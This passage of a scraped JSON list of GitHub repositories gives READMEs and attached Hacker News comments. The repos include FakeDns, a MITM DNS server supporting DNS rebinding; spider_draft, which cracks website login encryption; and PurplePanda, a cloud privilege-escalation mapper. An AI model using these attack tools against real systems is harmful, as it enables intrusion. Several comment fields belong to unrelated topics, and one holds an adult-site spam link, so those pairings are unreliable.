the right direction for anything but transient experiments (and of course what Jypyter is great at; communication, documentation, low barriers etc.)I... don\u2019t get the use case for this? What am I missing?Reminds me of the \"Literate Devops with Emacs\" article that has been discussed on HN before. Orgmode is well suited for this sort of thing:https://news.ycombinator.com/item?id=16559004", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Crypt0s/FakeDns", "link": "https://github.com/Crypt0s/FakeDns", "tags": [], "stars": 513, "description": "A regular-expression based python MITM DNS server with support for DNS Rebinding attacks", "lang": "Python", "repo_lang": "", "readme": "FakeDns\n=======\nUpdate 4/14/2020 - Python 2 support removed and code swapped to Python3\n\nNow with round-robin & improved options!\n\nBugs:\n@crypt0s - Twitter\n\nbryanhalf@gmail.com - Email\n\n\nA python regular-expression based DNS server!\n\n USAGE:\n ./fakedns.py [-h] -c Config path [-i interface IP address] [--rebind]\n\nThe dns.conf should be set the following way:\n\n [RECORD TYPE CODE] [python regular expression] [answer] [rebind answer]\n\nThe answer could be a ip address or string `self`,\nthe `self` syntax sugar will be translated to your current machine's local ip address, such as `192.168.1.100`.\n\nIf a match is not made, the DNS server will attempt to resolve the request using whatever you have your DNS server set to on your local machine and will proxy the request to that server on behalf of the requesting user.\n\n\nSupported Request Types\n=======================\n - A\n - TXT\n - AAAA\n - PTR\n - SOA\n\nIn-Progress Request Types\n=========================\n - MX\n - CNAME\n\nMisc\n====\n - Supports DNS Rebinding\n - Supports round-robin\n\nRound-Robin\n===========\nRound-robin rules are implemented. Every time a client requests a matching rule, FakeDNS will serve out the next IP in the list of IP's provided in the rule. \nA list of IP's is comma-separated.\n\n\nFor example:\n\n A robin.net 1.2.3.4,1.1.1.1,2.2.2.2\n\nIs a round-robin rule for robin.net which will serve out responses pointing to 1.2.3.4, 1.1.1.1, and 2.2.2.2, iterating through that order every time a request is made by any client for the robin.net entry.\n\n*NOTE* : These IP's aren't included as a list to the client in the response - they still only get just one IP in the response (could change that later)\n\nDNS Rebinding\n=============\nFakeDNS supports rebinding rules, which basically means that the server accepts a certain number of requests from a client for a domain until a threshold (default 1 request) and then it changes the IP address to a different one.\n\nFor example:\n\n A rebind.net 1.1.1.1 10%4.5.6.7\n\nMeans that we have an A record for rebind.net which evaluates to 1.1.1.1 for the first 10 tries. On the 11th request from a client which has already made 10 requests, FakeDNS starts serving out the second ip, 4.5.6.7\n\nYou can use a list of addresses here and FakeDNS will round-robin them for you, just like in the \"regular\" rule.\n\n\nTesting FakeDNS in Docker\n======\n_(localhost only without extra steps)_\n\nI have had a lot of success testing/developing FakeDNS in Docker because it's easier than running it natively on modern Ubuntu installs which have their own DNS services running on port 53 already.\n\nIf you want to try it out, you can do so without much heavy lifting by following these steps:\n\nAssuming you are **_inside the FakeDns directory_**: `sudo docker run --interactive --tty --volume \\`pwd\\`:/opt/FakeDns -p 5353:53/udp python:3.8 /opt/FakeDns/fakedns.py -c /opt/FakeDns/dns.conf.example`. And to test you can run `nslookup -port=5353 testrule.test 127.0.0.1` which should return `1.1.1.1` on your first request\n\nOr, if you'd like to use docker-compose, simply run `docker-compose up` and use the same test as above.", "readme_type": "markdown", "hn_comments": "Clickable link: https://filippo.io/fakenews/Does this only work with OpenSea projects today? What other NFT marketplaces do you plan to support in the future?Can you explain a bit how you know wether or not there's a scam going on with an NFT in a marketplace?Hello fellow Hackers, Saoud from Fakespot here.We are excited to announce the latest product in the Fakespot suite, NFT Guard!This extension will provide verification of NFT collections/NFTs on OpenSea (for first release, we are planning other marketplaces based on user/community feedback) and the detection of scam mint sites that will steal your tokens once a wallet is connected.Please leave comments here and I'd be more than happy to answer them!\"Infiltrated\" implies there was a state other than \"saturated\"Certainly would not have trusted the company with so much money if Sequoia's name wasn't plastered all over its marketing.Happy to share more details / proof in the comments. HN restricted the length of the post to 2k chars.HN: what can I do?Clickable links:https://coinswitch.co/https://coinswitch.co/termshttps://coinswitch.co/app/exchange/transaction/28f07022-4ab2...https://www.sequoiacap.com/companies/Tampering with the seal is just one way to do it. When I worked in transportation, we saw an operation that could take trailer doors off a truck, simultaneously, with out breaking the seal. And put them back on when they are done. We've also seen people cut holes in the side panels and patch them when they are finished.It's an interesting idea. Maybe it creates a \"harder door to kick in\" and criminals will target containers with non crypto seals.It seems like a cool idea but how would it stop the smuggling? The freight companies could just load the container with the contraband before they lock it up.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "onepureman/spider_draft", "link": "https://github.com/onepureman/spider_draft", "tags": [], "stars": 514, "description": "\u5404\u79cd\u7f51\u7ad9\u7684\u767b\u9646\u7834\u89e3\uff0c\u4ec5\u4f9b\u4ea4\u6d41\u5b66\u4e60\uff0c\u5305\u62ec\uff1a126\u90ae\u7bb1,17173,189\u90ae\u7bb1,360\u767b\u5f55\u4e2d\u5fc3,37\u73a9,39\u5065\u5eb7,51\u6e38\u620f,58\u540c\u57ce,bilibili,YY\u76f4\u64ad,\u4e00\u52a0\u624b\u673a,\u4e2d\u56fd\u79fb\u52a8,\u4e5d\u6e38,\u4eca\u65e5\u5934\u6761,\u4f01\u67e5\u67e5,\u4f18\u9177\u89c6\u9891,\u4fe1\u606f\u516c\u793a\u7cfb\u7edf,\u51e4\u51f0\u7f51,\u53bb\u54ea\u513f,\u542f\u4fe1\u5b9d,\u548c\u8baf\u7f51,\u54aa\u5495\u89c6\u9891\u767b\u5f55,\u552f\u54c1\u4f1a,\u559c\u9a6c\u62c9\u96c5,\u56fd\u7f8e,\u5927\u4f17\u70b9\u8bc4,\u5927\u9ea6\u7f51,\u5929\u773c\u67e5,\u597d\u8c46\u83dc\u8c31,\u5b9c\u8d37\u7f51,\u5c0f\u7c73\u5546\u57ce,\u5f00\u6e90\u4e2d\u56fd,\u5fae\u535a,\u6052\u4fe1\u6613\u8d37,\u623f\u5929\u4e0b,\u641c\u623f\u5e2e,\u641c\u72d0,\u641c\u72d0\u89c6\u9891,\u641c\u72d7\u7ffb\u8bd1,\u6597\u9c7c,\u65b0\u534e\u7535\u5b50\u90ae\u5c40,\u6613\u8f66\u7f51,\u6709\u8d5e\u7f51,\u6dd8\u5b9d,\u7231\u4f01\u67e5,\u7231\u5e94\u7528,\u732b\u773c,\u73cd\u7231\u7f51,\u767e\u5bb6\u53f7,\u7a7a\u4e2d\u7f51,\u7b51\u9f99\u5b66\u793e,\u7c89\u7b14\u7f51,\u7eb5\u6a2a\u5c0f\u8bf4\u7f51,\u7f51\u6613,\u7f8e\u56e2,\u8001k\u6e38\u620f,\u8054\u901a\u8425\u4e1a\u5385,\u805a\u60e0\u5546\u57ce,\u8292\u679cTV,\u864e\u7259,\u8c46\u74e3,\u9014\u725b,\u9017\u6e38\u7f51,\u91d1\u725b\u7406\u8d22,\u95ee\u5377\u661f,\u963f\u91cc\u4e91,\u98ce\u884c\u7f51,\u98de\u5362\u5c0f\u8bf4\u7f51,\u9b45\u65cf\u3001\u3001\u3001", "lang": "Python", "repo_lang": "", "readme": "## #Dedicated to the js cracking of the login of various websites, which is continuously updated. . . (Due to working hours, many websites cannot be completed at one time and will be updated all the time)\n(Also: Crawlers that will supplement various website data later)\n\n####At present, it mainly cracks the js encryption of website login. The use of js to crack the click verification has not yet been involved. At present, the cracking of these two verification codes is mainly selenium, but I want to use js to crack it. I am studying js cracking at the same time The selenium solution will also be provided, please move to another project of mine ([Click to enter the project, currently this project will not be updated due to the completion of js cracking the verification code](https://github.com/onepureman/ selenium_login_cracking))\n\n### If you have big cows or are interested, you can communicate and give advice, or you can private message me to do some learning things together: [My Blog](https://blog.csdn.net/amanloveformi).\n\n\n\n\n# Tianyancha sliding login has been cracked, and issues such as sliding verification in subsequent projects will be updated one by one\n\n\nDisclaimer here: This project is only for learning and communication, not for commercial use, otherwise the consequences will be borne by the user!", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "liberize/alfred-dict-workflow", "link": "https://github.com/liberize/alfred-dict-workflow", "tags": [], "stars": 512, "description": "A multi-feature, fast and handy alfred dictionary workflow.", "lang": "Python", "repo_lang": "", "readme": "# Alfred word search expansion\n\nVersatile, fast and easy-to-use Alfred word lookup extension.\n\n**Please go to the release page to download the latest workflow and double-click to install it. **\n\n**For the convenience of use, please set the shortcut keys for word retrieval. **\n\n## Use the system's built-in Oxford dictionary\n\nSince the macOS dictionary format changes with each update, the latest version is not guaranteed to work and support for older versions will be removed.\n\nThe current version only supports 10.13. For systems below 10.13, please use the old version of workflow.\n\nFirst open Dictionary.app and install the Oxford English-Chinese Chinese-English Dictionary.\n\nThen install lxml :\n\n command -v pip || sudo easy_install pip\n sudo pip install lxml\n\n## Introduction\n\n* Supported dictionaries:\n * System dictionary, supports Landau and Oxford dictionaries\n * Youdao Online Dictionary\n * iCiBa Online Dictionary\n * Baidu Online Dictionary\n * Bing Online Dictionary\n * Sea words online dictionary\n* Support English-Chinese and Chinese-English mutual checking\n* Support phonetic symbols, the default display American phonetic symbols\n* Pronounced using the system TTS engine\n* Paraphrases can be quickly copied\n* Shortcut keys can be used to switch dictionaries\n* Cache query results to facilitate next query\n* Support shortcut keys to fetch words\n* Support custom configuration\n\n## screenshot\n\n![screenshot](http://ww1.sinaimg.cn/large/ded9da26gy1fuchcybxkbg20i70fqnpe.gif)\n\n## look up words\n\nLook up words:\n\n cc {word} @ {dict}\n\nDictionary code:\n\nDictionary | Codename\n--------------------------- | -----------\nSystem built-in Oxford dictionary (requires lxml) | nj, oxford\nLandau Local Dictionary (download required) | ld, landau\nYoudao Online Dictionary | yd, youdao\niciba Online Dictionary | cb, iciba\nBaidu Online Dictionary | bd, baidu\nBing Online Dictionary | by, bing\nHai word online dictionary | hc, dictcn\n\nNote:\n\n* The default keyword is cc (that is, word search), which can be modified through the configuration file.\n* Each dictionary has two long and short codes, the short code is the pinyin abbreviation, which is easy to remember, and the long code is the full name.\n* A switch shortcut can be enabled for each dictionary, `\u2318`/`\u2325`/`\u2303`/`\u21e7`/`fn` + `\u21a9`, which can be modified through the configuration file.\n* Landau dictionary is not built in the system, please [download](http://pan.baidu.com/s/1qWx4mV6) first, and then copy it to `~/Library/Dictionaries/` directory.\n* Since Bing and Haici do not provide APIs, they can only be obtained by parsing HTML, so the speed may be slightly slower (optimized).\n\n## Internal commands\n\nView internal commands:\n\n cc:\n\ncommand | function\n------- | ---------------------------------\nclean | clear all caches\nconfig | edit configuration file (json format)\nupdate | After modifying some items in the configuration file, it needs to be updated to take effect\n\nIt is recommended to execute an update every time the configuration file is modified to ensure it takes effect.\n\n## configuration file\n\nThe configuration file is in json format and currently has the following options:\n\n* \"keyword\": keyword, default is \"cc\".\n* \"default\": The default dictionary, which is the dictionary used when `@{dict}` is omitted, defaults to \"nj\".\n* \"keymap\": key binding, modify shortcut keys for switching dictionaries, support the following modifier keys:\n * \"none\": Behavior when pressing Enter directly, can be \"open\" or \"say\":\n - \"open\": Open the detailed explanation page (browser or system dictionary).\n - \"say\": Pronunciation, currently only supports the system tts engine.\n * \"ctrl/alt/shift/cmd/fn\": Dictionary code, long or short.\n* \"options\": Dictionary-related options, generally do not need to be modified.\n * \"dictcn\": sea words dictionary options:\n * \"wap_page\": Whether to use the wap page to look up words, the wap page has less information, the default is \"false\".\n* \"cache\": Cache related settings.\n * \"enable\": Enable or disable caching, default is \"true\".\n * \"expire\": cache expiration time, in hours, default is \"24\".\n\nNote:\n\n* There are also more detailed English comments in the configuration file, please be sure to understand the function of each option before modifying.\n* \"keyword\" and \"keymap\" After these two options are modified, execute update to take effect.\n* There is no special requirement, no need to modify the configuration file, just keep the default.\n\n## LICENSE\n\nGPL", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "symphonly/figaro", "link": "https://github.com/symphonly/figaro", "tags": ["voice", "voice-chat", "voice-changer", "discord", "python", "pyaudio", "figaro", "teamspeak", "voice-filters", "virtual", "microphone", "audio", "sound", "roadmap", "cli", "sound-effects"], "stars": 512, "description": "Real-time voice-changer for voice-chat, etc. Will support many different voice-filters and features in the future. \ud83c\udfb5", "lang": "Python", "repo_lang": "", "readme": "

\n \"Figaro\"\n

\n

Figaro

\n

\n \"GitHub\"\n \"GitHub\n \"GitHub\n

\n\n---\n\n## About\n\nReal-time open-source voice modification program & sound board. Can be useful for many things, especially when used in combination with virtual sound i/o devices.\n\n![figaro collage](media/figaro-collage.png)\n\n![figaro demo](media/figaro-demo.gif)\n\n## Table of Contents\n\n- [About](#about)\n- [Table of Contents](#table-of-contents)\n- [Setup](#setup)\n - [Development](#development)\n - [Linux](#linux)\n - [Mac](#mac)\n - [Windows](#windows)\n - [Manual Setup](#manual-setup)\n - [Advanced setup](#advanced-setup)\n- [Usage](#usage)\n - [CLI](#cli)\n - [GUI](#gui)\n - [Figaro-Script](#figaro-script)\n - [General Syntax](#general-syntax)\n - [Defining a Hotkey](#defining-a-hotkey)\n - [Comments](#comments)\n - [Builtins](#builtins)\n - [Pause](#pause)\n- [Roadmap](#roadmap)\n- [References](#references)\n\n## Setup\n\nIf you're just looking to use *Figaro* and not work on it, then there's no reason to set up the development environment like described below, simply download the appropriate release for your platform from the [releases](https://github.com/MattMoony/figaro/releases) page and you're good to go!\n\n
\n \n \n
\n\n### Development\n\nIf you're on `Linux`, `Windows` or `Mac`, then setting up should be easy! Simply run the appropriate setup script and it will guide you through the whole process.\n\n#### Linux\n\nMake `./setup.sh` executable ... (or run it with an appropriate interpreter) ...\n\n```bash\nchmod 755 ./setup.sh\n```\n\n... execute it: `./setup.sh` ... and have fun with `python figaro.py`!\n\n#### Mac\n\nThe same as the [Linux Setup](#linux), just use `./setup-mac.sh` instead of `./setup.sh`.\n\n#### Windows\n\nFirst, in order to allow the setup _powershell_ script to run, you need to execute the following command in an administrator powershell:\n\n```ps\nSet-ExecutionPolicy RemoteSigned\n```\n\n... afterwards, executing `.\\setup.ps1` will guide you through the whole setup process! You can now execute `python figaro.py`.\n\n#### Manual Setup\n\nFirst of all, for `Figaro` to be able to work with audio files other than `wav`, you need to download and install `ffmpeg` (see [References](#References) for the link to the official download page).\n\n- **Linux**: `pip install -r requirements-unix.txt`\n- **Mac**: `pip install -r requirements-unix.txt`\n- **Windows**: `pip install -r requirements-windows.txt`\n\n... if you're on **Windows** and you get an error when installing `PyAudio` try downloading a PIP wheel suitable for your Python version from the link provided in [References](#References).\n\nIf everything works out, you're good to go!\n\n### Advanced setup\n\nThe following steps will explain how to use this program with the commonly used voice-chat application `Discord` on Windows:\n\n1. Download and install a virtual audio input device (if you don't know any specific one, try the one mentioned in [References](#References)).\n2. When selecting an output device at the startup of `Figaro`, choose the virtual input device you just installed (e.g.: `CABLE Input`).\n3. In Discord, go to `User Settings > Voice & Video > Input Device` and select the virtual input device from the dropdown (e.g.: `CABLE Output`).\n4. There you go, your friends should only be able to hear your filtered voice now.\n\n## Usage\n\n### CLI\n\nCLI-Usage is explained [here](docs/cli.md).\n\n### GUI\n\nGUI-Usage is explained [here](docs/gui.md).\n\n### Figaro-Script\n\nYou can now also use figaro script (.fig) for defining hotkeys and their behaviour. Whether you want a sound effect to be played, or an attribute to be shown, it can all be bound to a certain keypress.\n\n#### General Syntax\n\nFigaro-Script was heavily inspired by [AutoHotkey](https://www.autohotkey.com/), so, if you are capable of defining hotkeys and their functionality with ahk-script, think of this as a very, very simplified version of that.\n\nBut, if you aren't aware of ahk, let me introduce you to the basic syntax very quickly:\n\nYour script, the .fig file, consists of multiple hotkey-definition blocks which tell Figaro which key combinations should result in what behaviour. Apart from that, you can also have comments, to make your script more readable and easier to understand for a future you.\n\n#### Defining a Hotkey\n\nIn order to define which keys make up your hotkey, you just need to write all of them in one line and end it with `::`. After this first line, you write all your commands and end the definition block with `return`. This could look something like the following:\n\n```text\n...\n\nq::\nstart sound tmp/asdf.mp3 2\nreturn\n\n...\n```\n\n... this hotkey would be triggered every time the `q` is pressed.\n\nCertain control keys need alternative symbols (this is equalivalent to ahk-script):\n\n* `alt` is represented by `!`\n* `ctrl` is represented by `^`\n* `shift` is represented by `+`\n\n... keep in mind that the definition of hotkeys is usually case insensitive, which means in order to, for example, only trigger the hotkey on an uppercase `Q`, you would need to use `+q::` as your definition.\n\n#### Comments\n\nThis is fairly easy to explain. If you have ever used a popular programming language such as C, C++, Java, etc. you already know how to use comments. The only thing to bear in mind is that so far, I have only implemented `single-line` comments.\n\nFor people who have never used such a programming language before, this is the correct syntax for comments in Figaro-Script:\n\n```text\n...\n\n// triggered by pressing `lower-case q`\n// will play the mp3 file \"tmp/asdf.mp3\" at 200% of the original volume ...\nq::\nstart sound tmp/asdf.mp3 2\nreturn\n\n...\n```\n\n#### Builtins\n\nDespite the CLI commands, certain builtin functions are also available to you (at the moment there aren't many, but I will at more should the need to do so arise):\n\n##### Pause\n\nYou can use this command in order play a sound effect, or do anything else for that matter, after waiting for a given amount of `milliseconds`. E.g.:\n\n```text\n...\nstart sound tmp/1.mp3\npause 3000\nstart sound tmp/2.mp3\n...\n```\n\n... this would play the sound effect `tmp/1.mp3`, wait for `3 seconds` and then play the next sound effect `tmp/2.mp3`.\n\n_More docs coming soon! Disclaimer: Some of the commands described above might still be removed or altered..._\n\n## Roadmap\n\nJust a small preview of what is about to come. It's very likely that this roadmap will continue to grow in the future, as I get more ideas or if somebody wants to contribute.\n\n* [x] [CLI](#cli)\n * [x] I/O device selection\n * [x] Live status (live audio graph in console)\n * [x] Filter control\n * [x] Sound effects (soundboard-like abilities)\n* [ ] [GUI](#gui)\n * [x] I/O device selection\n * [x] Live sound wave graph\n * [x] Filter control\n * [ ] Soundboard\n * [x] Functionality\n * [ ] Advanced features\n* [x] Filters\n * [x] Volume\n * [x] Pitch-Shift\n * [x] \"Trippy\"-Filter\n * [x] Echo\n * [x] Noise\n * [x] Crackle\n * [x] Randomized\n* [ ] [Figaro-Script](#figaro-script)\n * [x] Using CLI commands\n * [x] Hotkeys\n * [ ] Advanced builtins\n* [ ] Security\n * [x] Remote Authentication\n * [x] Encrypted sockets\n * [ ] Fine-grained settings\n\n## References\n\n* Windows Virtual Sound I/O ... [vb-audio](https://www.vb-audio.com/Cable/)\n* PyAudio Windows Wheel ... [uci](https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyaudio)\n* FFmpeg download ... [ffmpeg.org](https://ffmpeg.org/download.html)\n* JWT minimum secret length ... [RFC 7518](https://tools.ietf.org/html/rfc7518#section-3.2)\n* JWT recommended secret length ... [Auth0](https://auth0.com/blog/brute-forcing-hs256-is-possible-the-importance-of-using-strong-keys-to-sign-jwts/)\n\n---\n\n... MattMoony (June 2021)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "carlospolop/PurplePanda", "link": "https://github.com/carlospolop/PurplePanda", "tags": ["cloud", "privesc", "gcp", "github", "kubernetes"], "stars": 512, "description": "Identify privilege escalation paths within and across different clouds", "lang": "Python", "repo_lang": "", "readme": "# PurplePanda\n![](https://github.com/carlospolop/PurplePanda/raw/master/images/logo.png)\n\nThis tool fetches resources from different cloud/saas applications focusing on permissions in order to **identify privilege escalation paths and dangerous permissions** in the cloud/saas configurations. Note that PurplePanda searches both **privileges escalation paths within a platform and across platforms**.\n\nThe name comes from the animal **Red Panda**. This panda eats peas, just like Purple Panda, which can ingest API keys/tokens found by these **[PEASS](https://github.com/carlospolop/PEASS-ng)**. The color was changed to purple because this tool is meant mainly for **Purple Teams** (because it can be **highly useful for both Blue and Red Teams**).\n\n## How to use\nEach folder inside `/intel` defines one platform that can be enumerated and **contains a README.md file explaining how to use that specific module**.\n\nDownload **[Neo4jDesktop](https://neo4j.com/download-center/#desktop)** and create a database. Then **export the env variables `PURPLEPANDA_NEO4J_URL` and `PURPLEPANDA_PWD`** with the URL to the neo4j database and the password.\n\nIf you want **shodan** to be used with public IPs discovered during the enumeration **export a env variable called *SHODAN_KEY* with a valid api key of shodan**.\n\nThen just install and launch the program indicating the platforms you want to enumerate comma separated like.\n\n### Local install\n```bash\ngit clone https://github.com/carlospolop/PurplePanda\ncd PurplePanda\npython3 -m venv .\nsource bin/activate\npython3 -m pip install -r requirements.txt\nexport PURPLEPANDA_NEO4J_URL=\"bolt://neo4j@localhost:7687\"\nexport PURPLEPANDA_PWD=\"neo4j_pwd_4_purplepanda\"\npython3 main.py -h # Get help\npython3 main.py -e -p google,github,k8s --github-only-org --k8s-get-secret-values --gcp-get-secret-values # Enumerate google, github and k8s\n```\n\n### Docker\n```bash\n# Consider adding the API keys in the Dockerfile\ndocker rm -f purplepanda\ndocker build --tag=purplepanda .\n# Execute -h\n## CHange -h for the params you want to run purplepanda with\ndocker run -t \\\n -e PURPLEPANDA_NEO4J_URL=\"bolt://neo4j@host.docker.internal:7687\" \\\n -e PURPLEPANDA_PWD=\"s3cr3t\" \\\n -e GOOGLE_DISCOVERY=... \\\n -e GITHUB_DISCOVERY=... \\\n -e K8S_DISCOVERY=... \\\n -e CONCOURSE_DISCOVERY=... \\\n -e CIRCLECI_DISCOVERY=... \\\n purplepanda python3 main.py -h\n\n## -t is needed to see the output properly\n## If you are using Neo4Desktop to connec to the DB use the domain host.docker.internal\n## You might need to use the option '-v' to mount files with configurations\n```\n\nPurplePanda has **2 analysis modes**:\n- `-e` (*enumerate*): This is the **main one**, it will try to gather data and analyze it.\n- `-a` (*analyze*): This will perform a **quick analysis of the provided credentials**.\n\n### Video tutorial\nCheck how to use and inspect the data gathered by PurplePanda:\n\n[![Tutorial](https://img.youtube.com/vi/zl5NdvoWHX4/0.jpg)](https://www.youtube.com/watch?v=zl5NdvoWHX4)\n\n### For Blue/Purple Teams\n\nUse credentials for each platform with at least **admin read access to all the resources** of the platform. This will help you to see exactly the **privesc paths** that can be abused within your configurations in each platform and across\n\n### For Red Teams\n\nPurplePanda is also **designed to be used by Red Teams**. In general, cloud/saas platforms **won't give everyone access to read** the configuration of the platform, that's why PurplePanda supports the **use of several keys for the same platform**, in order to try to enumerate everything with all the keys you compromised and have the most accurate view of the configuration of the platform.\n\n## Supported platforms\n- **Google Cloud Platform (GCP)**: To understand how GCP security works and how to abuse roles and permissions **read https://book.hacktricks.xyz/cloud-security/gcp-security**\n- **Github**: To understand how Github security works and how to bypass branch protections, steal secrets, privesc... **read https://book.hacktricks.xyz/cloud-security/github-security**\n- **Kubernetes (K8s)**: To understand how Kubernetes RBAC security works and how to abuse roles, privesc to other clouds... **read https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes**\n\n\n## How to use the data\n**Use the `-d` parameter** indicating a directory. Then, **PurplePanda will write in this directory several interesting analysis** in `csv` format of the information obtained from all the platforms. The recommendation is to **find interesting and unexpected things in those files** and then move to **analyze those interesting cases with the graphs**.\n\nEach folder inside `/intel` defines one platform that can be enumerated and **contains a README.md file explaining how to use that specific module**. Moreover, each folder also contains a `HOW_TO_USE.md` file and a `QUERIES.md` file. \n\nIn the `HOW_TO_USE.md` file you can find the **best queries to perform an investigation on how to escalate privileges** (*for Purple, Blue, and Red Teams*).\n\nIn the `QUERIES.md` file you will find **all proposed queries** to investigate the data easier.\n\n### How to visualize the data in graphs\nFollow the instructions indicated in **[VISUALIZE_GRAPHS.md](https://github.com/carlospolop/PurplePanda/blob/master/VISUALIZE_GRAPHS.md)**\n\n## How to Contribute\n\nIn the **root folder and in each folder inside `intel/`** you will find a **`TODO.md` file**. You can find in those files how you can help. Just **send a PR with the addition**.\n\n**PRs with fixes** are also welcome :)\n\nMoreover, if you have **other ideas** that aren't in those TODO files feel free to send a PR.\n\n\nBy Carlos PolopTM\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Febase/FeBase", "link": "https://github.com/Febase/FeBase", "tags": [], "stars": 512, "description": "FeBase \uc640 \ud568\uaed8\ud558\ub294 Frontend \ud558\ub098\uc529 \ubc30\uc6cc\uac00\uba74 \ub298\uc5b4\ub098\ub294 CS\uc9c0\uc2dd \uc624\ud018\uc774!", "lang": "Python", "repo_lang": "", "readme": "import pathlib\nfrom lib.header import Header\nfrom lib.rmd import Rmd\n# from lib.logger import Logger\n# from lib.gitlog import Gitlog\n\nroot_path = pathlib.Path(__file__).parent.resolve()\n\n\ndef start_update():\n md_paths = root_path.glob('*/*.md')\n # gitlog = Gitlog(root_path)\n toc_data = {}\n for file_path in md_paths:\n fp = file_path.open()\n header = Header(fp)\n header.set_header(['title', 'author', 'date', 'category'])\n header_data = header.get_header()\n path = str(file_path.relative_to(root_path))\n url = \"https://github.com/Febase/FeBase/blob/master/{}\".format(path)\n category = header_data['category'].upper()\n item = {\n \"path\": path,\n \"url\": url,\n \"header\": header_data\n }\n if category in toc_data:\n toc_data[category].append(item)\n else:\n toc_data[category] = [item]\n # logger.update(header_data, url, path)\n # gitlog.check_status()\n # logger.save(log_path)\n return toc_data\n\n\ndef rewrite_readme(toc_data):\n readme = root_path / 'README.md'\n rmd = Rmd(readme)\n rmd.update_toc(toc_data)\n rmd.rewrite()\n\n\nif __name__ == \"__main__\":\n # log_path = root_path / '.log/readme_log.json'\n # logger = Logger()\n # logger.load(log_path)\n toc_data = start_update()\n rewrite_readme(toc_data)\n", "readme_type": "text", "hn_comments": "No idea how git rebase, productivity, and layoffs could be related at all. Curious, though.It\u2019s a metric of people looking to improve at git. So maybe either an indication more people are looking to get into the field, or that people are looking to improve their productivity. Or maybe it\u2019s part of some cert people are after.Hello everyone, I have some wise advice that will help you if you want to unwind and have a nice time. For instance, https://grantubodesexo.com/ is perfect for a night out because it allows you to let off steam while having fun. I think you should have a look.\"Within a converged timeline there are two timelines of events, so to create a new non-converged timeline you have to go back to the point in time where those timelines converged and add every event in the converged timelines in order in the new timeline.If things don't really work and a conflict emerges you, as the master of time, have to decide the right data to put into the new timeline\"Hope it helps you breathe more easily :)I'm the opposite and think rebasing is easier, but I am biased obviously since I have only used rebasing to solve merge conflicts.There are a couple ways of performing a git rebase, namely* git rebase* git rebase interactive (git rebase -i)* git rebase --ontoI think following these videos may help and will explain it better than I can.What is Git Rebase? [Intermediate Git Tutorial] - https://www.youtube.com/watch?v=_UZEXUrj-DsSquashing Git commits with Interactive Rebase -https://www.youtube.com/watch?v=7IfkL8swmFwHow to undo git rebase using git reflog. - https://www.youtube.com/watch?v=qP4i3S2hujc&t=203sIt's not. Just spend some time thinking about it not as a command to execute, but rather as an operation on a data structure you're working with (which is your repository) and it will click.Git is a good idea with a poor execution and namingGit appears to be a tool to manage merges using deltas. Git is actually a tool that simply stores everything in the current commit, and makes a nice graph showing Connections between those commits which theoretically represent deltas.All trouble arises when this abstraction breaks. It seems to me that the purpose of git merge is to simply allow you to work around broken abstractions. You can make the graph appear how you want, without having to jump through a bazillion unnecessary hoops to make a nice set of deltas.Or... I'm wrong and about to find out after hitting \"add comment\"Everything Git is kind of hard to understand, but once it \"clicks\", you kinda start thinking it was easy all along.My suggestion is: before every rebase:- mkdir patches- cd patches- git format-patch HEAD~30 (in case you had 30 commits on top of the main branch but you can also \"git format-patch $SHA\" to get patches up to that SHA, not including)- git pull --rebaseThen, if the rebase fails:- git checkout -b branchname-rebaseattempt origin/branch- make- git am 0001*- make- git am 0002*- git am --abort- etcThis way you have a backup copy of every one of your commits as a patch file, and you can better understand and fix your conflict step-by-step without being \"locked\" in the process of a git-rebase. Sometimes when there are simple conflicts I edit the patch files themselves before applying.How the hell is it mysterious? It is just cherry-picking the commits then setting the branch pointer. Merge is the evil one because you can hide any changes you like in the commit.I was waiting for \u201eGitlab releases a UI for rebase -i in MRs\u201c.Years ago I really liked rebase, now I never use it. I don't know why, though, one of those mysteries of the brain.Been using git for 10 years now, never rebased, never had an issue.Rebase has become so integral to my workflow, it's hard to imagine living without it. I intentionally avoid merge commits, including configuring git pull to rebase rather than merge. I find it so much easier to commit a bunch of tiny iterations while doing local testing, rebase and squash them, then post them for review. As a bonus, I frequently push after each of those small commits to a feature branch so I don't have to worry about losing work if my drive dies.Easily the most underutilized and poorly understood part of the typical git workflowI don't know if Christian would go this far, but I actually put this into my ~/.gitconfig so that I'm always rebasing[pull]rebase = trueedited for line spacingIn my personal experience rebase made ISO9000/AS9000 gatekeepers twitchy. Even to the extent that they'd tell the Overlords \"Do everything in Perforce, or else\".And then the Overlords shut down all the VCSs because \"this isn't a software company\". Then everyone sneaks around using weird homebrew portable tracking widgets, or, more often, just gives up.Is rebase handy? Oh yeah.I love rebase. It allows for a Draft PR workflow where you can have your WIP out in the open for a big project, and then clean it all up via rebasing right before asking for reviews. Just don't rewrite history on master. :^)Every PR we have in GitHub is merged with a squash, so I'm kinda missing the value proposition here. Is it really crucial for each commit to be a nice clean unit of work?Git is in general a terrible tool: I\u2019ve always thought of it as a shining example of where \u201cworse is better\u201d ought to have been applied. Rebasing is one of its worst features. For non-trivial changes, anyway, it is often just a way to add complexity and messiness to what should be a simple workflow. And the benefits aren\u2019t at all as clear as its advocates contend.If I've already reviewed a PR and the author makes further changes, I definitely prefer to review an add-on commit. If the history is rewritten/rebased, then IME the entire PR needs to be re-reviewed from scratch. If we're talking about a <10 line change, then, by all means, rebase to your heart's content. With anything more complicated than that, rebasing a branch that's already been looked at can be disruptive and I'd strongly recommend against it (though squash-and-merge after review is fantastic).The one thing I'd like to do is to insert a commit between two commits, then edit this and then make a modification.Currently I create a text file, add this, then move this up to where I need to insert it and edit this commit.Keeping your commits as separate units of change, and leveraging rebase/ff-only is worth is simply so you can do stuff like the following. git revert $(git rev-list COMMIT43^..COMMIT123 -- path/to/thing)\n\nI've been on teams where everyone _hates_ what a stickler I am about good VCS hygiene until they realize something that looks like it's going to be a big pain in the ass at first glance is doable with a one liner.I sometimes run into rebases where solving merge conflicts 3 times is hard. Replaying 